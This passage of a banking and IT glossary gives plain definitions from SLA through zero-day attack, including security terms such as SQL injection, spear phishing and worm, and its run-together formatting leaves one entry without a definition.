SLA - Service level agreement. SLAs detail the responsibilities of an IT service provider, the rights of the service provider's customers, and the penalties assessed when the service provider violates any element of the SLA. SLAs also identify and define the service offering itself, plus the supported products, evaluation criteria, and quality of service customers should expect. SLAs are typically measured in terms of metrics. Examples include processing completion times and systems availability times.
Smart cards - A card with an embedded computer chip on which information can be stored and processed.
Sniffing - The passive interception of data transmissions.
Social engineering - A general term for trying to trick people into revealing confidential information or performing certain actions.
SONET - Synchronous optical network. A standard that defines interface standards for connecting fiber-optic transmission systems.
Sound practices - Defined in the "Interagency Paper on Sound Practices to Strengthen the Resilience of the U.S. Financial System," which was issued by the Board of Governors of the Federal Reserve System, Office of the Comptroller of the Currency, and Securities and Exchange Commission.
Source code - Software program instructions written in a format (language) readable by humans.
Source program - A program written in a programming language (such as C, Pascal, or COBOL). A compiler translates the source code into a machine-language object program.
Spear phishing - An attack that targets a specific user or group of users and attempts to deceive the user into performing an action that launches an attack, such as opening a document or clicking a link. Spear phishers rely on knowing some personal piece of information about their target, such as an event, interest, travel plans, or current issues. Sometimes this information is gathered by hacking into the targeted network.
Spiral development - An iterative project management model that focuses on the identification of project and product risks and the selection of project management techniques that best control the identified risks.
Split processing - The ongoing operational practice of dividing production processing between two or more geographically dispersed facilities.
Spoofing - A form of masquerading where a trusted IP address is used instead of the true IP address as a means of gaining access to a computer system.
Spot - The most common foreign exchange transaction. Spot or spot date refers to the spot transaction value date that requires settlement within two business days, subject to value date calculation.
SQL injection attack - An exploit of target software that constructs structured query language (SQL) statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as the ability to add or modify data in the database.
Screen scraping - A process used by information aggregators to gather information from a customer's website, whereby the aggregator accesses the target site by logging in as the customer, electronically reads and copies selected information from the displayed webpage(s), then redisplays the information on the aggregator's site. The process is analogous to "scraping" the information off the computer screen.
SSL (secure sockets layer) - An encryption system developed by Netscape. SSL protects the privacy of data exchanged by the website and the individual user. It is used by websites whose names begin with https instead of http.
Standard Entry Class (SEC) code - Three-character code in an ACH company/batch header record used to identify the payment type within an ACH batch.
Stateful inspection - A firewall inspection technique that examines the claimed purpose of a communication for validity. For example, a communication claiming to respond to a request is compared to a table of outstanding requests.
Storage area network (SAN) - A SAN represents several storage systems that are interconnected to form one back-up network, which allows various systems to be connected to any storage device and prevents dependence on a single line of communication.
Storage virtualization - The process of taking many different physical storage networks and devices and making them appear as one "virtual" entity for purposes of management and administration.
Store card - A credit card issued by a financial institution for a specific merchant or vendor that does not carry a bankcard association logo. Store cards can only be used at the merchant or vendor whose name appears on the front of the card.
Stored-value card - A card-based payment system that assigns a value to the card. The card's value can be stored on the card itself (i.e., on the magnetic stripe or in a computer chip) or in a network database. As the card is used for transactions, the transaction amounts are subtracted from the card's balance. As the balance approaches zero, some cards can be "reloaded" through various methods and others are designed to be discarded. These cards are often used in closed systems for specific types of purchases.
Stovepipe application - Stand-alone programs that may not easily integrate with other applications or systems.
Street tests - Also called cross-market tests or market-wide tests; sponsored by the Securities Industry Association, Bond Market Association, and Futures Industry Association. These tests validate the connectivity from alternate sites and include transaction, settlement, and payment processes, to the extent practical.
Substitute check (Check 21) - Also known as the Image Replacement Document (IRD). A paper reproduction of an original check that (1) contains an image of the front and back of the original check; (2) bears a MICR line that, except as provided under ANS X9.100-140, contains all the information appearing on the MICR line of the original check when it was issued and any additional information that was encoded on the original check's MICR line before an image of the original check was captured; (3) conforms in paper stock, dimension, and otherwise with ANS X9.100-140; and (4) is suitable for automated processing in the same manner as the original check. The Federal Reserve Board of Governors can by rule or order determine different standards.
Suspicious activity report (SAR) - Reports required to be filed under the Bank Secrecy Act when a financial institution identifies or suspects fraudulent activity.
Sustainability - The period of time for which operations can continue at an alternate processing facility.
Switch - A device that connects more than two LAN segments that use the same data link and network protocol.
Switched virtual circuit (SVC) - An SVC is a temporary connection between workstations that is disabled after communication is complete. Refer to permanent virtual circuit (PVC) for an additional communication method using circuits.
Synchronous data replication - A process for copying data from one source to another in which an acknowledgement of the receipt of data at the copy location is required for application processing to continue. Consequently, the content of databases stored in alternate facilities is identical to that at the original storage site, and copies of data contain current information at the time of a disruption in processing.
System administration - The process of maintaining, configuring, and operating computer systems.
System resources - Capabilities that can be accessed by a user or program either on the user's machine or across the network. Capabilities can be services, such as file or print services, or devices, such as routers.
Systems development life cycle - An approach used to plan, design, develop, test, and implement an application system or a major modification to an application system.
Systems development life cycle (SDLC) process - The scope of activities associated with a system, encompassing the system's initiation, development and acquisition, implementation, operation and maintenance, and ultimately its disposal, which instigates another system initiation.

T
T-1 line - A special type of telephone line for digital communication and transmission. T-1 lines provide for digital transmission with a signaling speed of 1.544 Mbps (1,544,000 bits per second). This is the standard for digital transmissions in North America. Usually delivered on fiber optic lines.
Table top exercise/structured walk-through test -
Tactical plan - Typically, a short-term plan that establishes the specific steps needed to implement a company's strategic plan.
These plans are often created by mid-level managers.TCP/IP - Transmission control protocol/Internet protocol. A communication standard for transmitting data packets from one computer to another. TCP/IP is used on the Internet and other networks. The two parts of TCP/IP are TCP, which deals with constructions of data packets, and IP, which routes them from machine to machine. Telecommunications - The exchange of information over significant distances by electronic means.Telnet - An interactive, text-based communications session between a client and a host. It is used mainly for remote login and simple control services to systems with limited resources or to systems with limited needs for security.Terminal services - A component of Microsoft Windows operating systems (both client and server versions) that allows a user to access applications or data stored on a remote computer over a network connection.Test assumptions - The concepts underlying an institution’s test strategies and plans. Test key - Internal controls used to verify the authenticity of incoming wire requests involve the use of test keys. A test key is a formula used to develop or interpret test codes or test words. Test codes or words consist of a series of numbers signifying different types of information and usually precede the text of the message. As an example, a test code may contain a bank number, the amount of the transaction, and a number indicating the day and week of the month. As an additional precaution, many test codes contain a variable (sequence number) based on the number of messages received. Test plan - A document that is based on the institution’s test scope and objectives and includes various testing methods. Test scenario - A potential event, identified as the operating environment for a business continuity or disaster recovery test, which the institution’s recovery and resumption plan must address. 
Test scripts - Documents that define the specific activities, tasks, and steps that test participants will conduct during the testing process. Test strategy - Testing strategies establish expectations for individual business lines across the testing life cycle of planning, execution, measurement, reporting, and test process improvement. Testing strategies include the testing scope and objectives, which clearly define what functions, systems, or processes are going to be tested and what will constitute a successful test.Third-party provider - Any type of company, including affiliated entities, non-affiliated entities, and alliances of companies providing products and services to a financial institution. Other terms used to describe service providers include subcontractors, external service providers, application service providers, and outsourcers. Also called a third-party service provider.Third-party relationship - Any business arrangement between a financial institution and another entity, by contract or otherwise. Third-party sender - A special subset of a technology service provider that is authorized to transmit ACH files on behalf of an originator. Typically, the ODFI must rely upon warranties by the third- party sender regarding the originators’ identity and credit worthiness, which places additional risks on the ODFI.Third-party service provider - Any type of company, including affiliated entities, non-affiliated entities, and alliances of companies providing products and services to the financial institution. Other terms used to describe service providers include subcontractors, external service providers, application service providers, and outsourcers. Third-party service provider (TPSP)(For ACH) - A third party, other than the ODFI or RDFI, that performs any function on behalf of the ODFI or the RDFI related to ACH processing. 
These functions would include the creation and sending of ACH files or acting as a sending or receiving point on behalf of a participating depository financial institution. Threat intelligence - The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision-making. Threat modeling - A structured approach that enables an institution to aggregate and quantify potential threats. In the context of application development, threat modeling can be used to capture, organize, and analyze all of the threat information of an application and its environment that affects application security. It is used to enable informed decision-making about application security and helps to produce and rank a list of security improvements.Token - A small device with an embedded computer chip that can be used to store and transmit electronic information. A soft token is a software-based token.Tokenization - The process of substituting a sensitive data element with a surrogate value, referred to as a token.Topology - A description of any kind of locality in terms of its physical layout. In the context of communication networks, a topology describes pictorially the configuration or arrangement of a network, including its nodes and connecting communication lines.Total cost of ownership (TCO) - The true cost of ownership of a computer or other technology system that includes original cost of the computer and software, hardware and software upgrades, maintenance, technical support, and training.Transaction testing - A testing activity designed to validate the continuity of business transactions and the replication of associated data. Trojan horse - Malicious code that is hidden in software that has an apparently beneficial or harmless use.Truncating bank (Check 21) - The financial institution that truncates the original check. 
If a person other than a financial institution truncates the original check, the truncating bank is the first financial institution that transfers, presents, or returns, in lieu of such original check, a substitute check or, by agreement with the recipient, information relating to the original check (including data taken from the MICR line of the original check or an electronic image of the original check), whether with or without the subsequent delivery of the original check.Trusted platform module - An international standard for a secure crypto processor that is a dedicated microprocessor designed to secure hardware by integrating cryptographic keys into devices.Trusted zone - A channel in which the end points are known and data integrity is protected in transit. Depending on the communications protocol used, data privacy may be protected in transit. Examples include secure socket layer, internet protocol security and a secure physical connection. Two-way polling - An emergency notification system that allows management to ensure that all employees are contacted and have confirmed delivery of pertinent messages.UUltra forward service - This service allows control over the re-routing of incoming phone calls to pre-determined alternate locations in the event of a telecommunications outage.UPS - Uninterruptible power supply. A device that allows your computer to keep running for at least a short time when the primary power source is lost. A UPS may also provide protection from power surges. A UPS contains a battery that "kicks in" when the device senses a loss of power from the primary source allowing the user time to save any data they are working on and to exit before the secondary power source (the battery) runs out. When power surges occur, a UPS intercepts the surge so that it doesn't damage your computer. 
URL - Abbreviation for “Uniform (or Universal) Resource Locator.” A way of specifying the location of publicly available information on the Internet, in the form: protocol://machine:port number/filename. Often the port number and/or filename are unnecessary.USA Patriot Act - The USA PATRIOT Act (Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act of 2001 (Public Law Pub.L. 107-56), commonly known as the "Patriot Act", was enacted by Congress to deter and punish terrorist acts in the United States and around the world by enhancing the law enforcement investigatory tools of both domestic law enforcement and foreign intelligence agencies.US-CERT - The U.S. Computer Emergency Readiness Team, part of the U.S. Department of Homeland Security’s National Cybersecurity and Communications Integration Center. US-CERT is a partnership between the Department of Homeland Security and the public and private sectors, established to protect the nation’s Internet infrastructure. US-CERT coordinates defense against and responses to cyber attacks across the nation. User Identification - The process, control, or information by which a user identifies himself or herself to the system as a valid user (as opposed to authentication).Utility - A program used to configure or maintain systems, or to make changes to stored or transmitted data.Utility programs - A program used to configure or maintain systems, or to make changes to stored or transmitted data.VVESDA - Very early smoke detection alert. A system that samples the air on a continuing basis and can detect fire at the pre-combustion stage.Virtual machine - A software emulation of a physical computing environment. Virtual Mall - An Internet website offering products and services from multiple vendors or suppliers.Virtual payment card - A controlled way of making payments by generating a unique credit card number to settle a specific transaction typically online. 
Also referred to as single-use credit cards. Virtual private network (VPN) - A computer network that uses public telecommunication infrastructure, such as the Internet, to provide remote offices or individual users with secure access to their organization's network. Virus - Malicious code that replicates itself within a computer.VLAN - Virtual local area network.Voice over Internet Protocol (VoIP) - The transmission of voice telephone conversations using the Internet or Internet Protocol networks.VOIP - Voice over Internet protocol. A term used in IP telephony for a set of facilities for managing the delivery of voice information using the Internet Protocol. Vulnerability - A hardware, firmware, or software flaw that leaves an information system open to potential exploitation; a weakness in automated system security procedures, administrative controls, physical layout, internal controls, etc., that could be exploited to gain unauthorized access to information or to disrupt critical processing. Vulnerability Analysis - Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.Vulnerability Scanning - Systematic examination of systems to determine the adequacy of security measures, identify security deficiencies, and provide data from which to predict the effectiveness of proposed security measures.WWalk-through drill/simulation test - This test represents a preliminary step in the overall testing process that may be used for training employees but not as a preferred testing methodology. During this test, participants choose a specific scenario and apply the BCP to it. Wallet card - Portable information cards that provide emergency communications information for customers and employees. 
Warehouse attack - The compromise of systems that store authenticators.WEB SEC code - An ACH debit entry initiated by an originator resulting from the receiver’s authorization through the Internet to make a transfer of funds from a consumer account of the receiver.Weblinking - The use of hyperlinks to direct users to webpages of other entities.Website - A webpage or set of webpages designed, presented, and linked together to form a logical information resource and/or transaction initiation function.Website hosting - The service of providing ongoing support and monitoring of an Internet-addressable computer that stores webpages and processes transactions initiated over the Internet.White-hat hacking - The specialization of penetration testing and other testing methodologies to review the security of an institution’s information systems by determining flaws and vulnerabilities. Also called ethical hacking.Whitelist - A list of trusted entities. Wide-scale disruption - An event that disrupts business operations in a broad geographic area. Wipe - Removal of data from a device.Wireless application protocol (WAP) - A data transmission standard to deliver wireless markup language (WML) content.Wireless communication - The transfer of signals from place to place without cables, usually using infrared light or radio waves.Wireless gateway server - A computer (server) that transmits messages between a computer network and a cellular telephone or other wireless access device. Wireless payment technology - The use of different core technologies to exchange payment credentials and authorization between the mobile device and the payment recipient. Examples include: near field communication, image based, carrier-based, mobile P2P, etc.Wireless phone - See "Cellular Telephone".Work program - A series of specific, detailed steps to achieve an audit objective. 
Work transfer - Work-transfer is a process whereby the staff located at a recovery site accepts the workload of staff located at a primary production site, and a data center located at a recovery site accepts the workload of the primary data processing site. Workstation - Any computer connected to a local-area network. Worm - A self-replicating malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is primarily because of security vulnerabilities on the target computers. WORM (Acronym) - Write once, read many times. A type of optical disk where a computer can save information once, can then read that information, but cannot change it.XXML - XML (Extensible Markup Language) is a ”metalanguage” – a language for describing other languages – which lets you design your own customized markup languages for different types of documents. It is designed to improve the functionality of the Web by providing more flexible and adaptable information identification.ZZero-day attack - An attack on a piece of software that has a vulnerability for which there is no known patch.